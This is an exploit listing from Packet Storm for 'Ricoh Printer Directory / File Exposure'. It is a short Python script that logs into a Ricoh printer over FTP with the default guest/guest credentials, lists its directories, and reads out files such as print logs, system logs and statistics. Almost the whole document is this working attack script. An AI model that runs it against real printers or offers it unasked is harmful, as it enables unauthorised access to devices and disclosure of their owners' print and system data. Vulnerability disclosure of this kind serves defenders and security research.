

Ricoh Printer Directory / File Exposure

Ricoh printers suffer from directory and file exposure vulnerabilities.

Packet Storm
#Exploit Title: Ricoh Printer Directory and File Exposure #Date: 9/15/2023#Exploit Author: Thomas Heverin (Heverin Hacker)#Vendor Homepage: Link: Ricoh Printers - All Versions#Tested on: Windows#CVE: N/A #Directories Found: Help, Info (Printer Information), Prnlog (Print Log), Stat (Statistics) and Syslog (System Log)from ftplib import FTPdef ftp_connect(ip):    try:        ftp = FTP(ip)        ftp.login("guest", "guest")        print(f"Connected to {ip} over FTP as 'guest'")        return ftp    except Exception as e:        print(f"Failed to connect to {ip} over FTP: {e}")        return Noneif __name__ == "__main__":    target_ip = input("Enter the Ricoh Printer IP address: ")        ftp_connection = ftp_connect(target_ip)    if ftp_connection:        try:            while True:                file_list = ftp_connection.nlst()                print("List of Ricoh printer files and directories:")                for index, item in enumerate(file_list, start=1):                    print(f"{index}. {item}")                                file_index = int(input("Enter the printer index of the file to read (1-based), or enter 0 to exit: ")) - 1                if file_index < 0:                    break                                if 0 <= file_index < len(file_list):                    selected_file = file_list[file_index]                    lines = []                    ftp_connection.retrlines("RETR " + selected_file, lines.append)                    print(f"Contents of '{selected_file}':")                    for line in lines:                        print(line)                else:                    print("Invalid file index.")        except Exception as e:            print(f"Failed to perform operation: {e}")        finally:            ftp_connection.quit()

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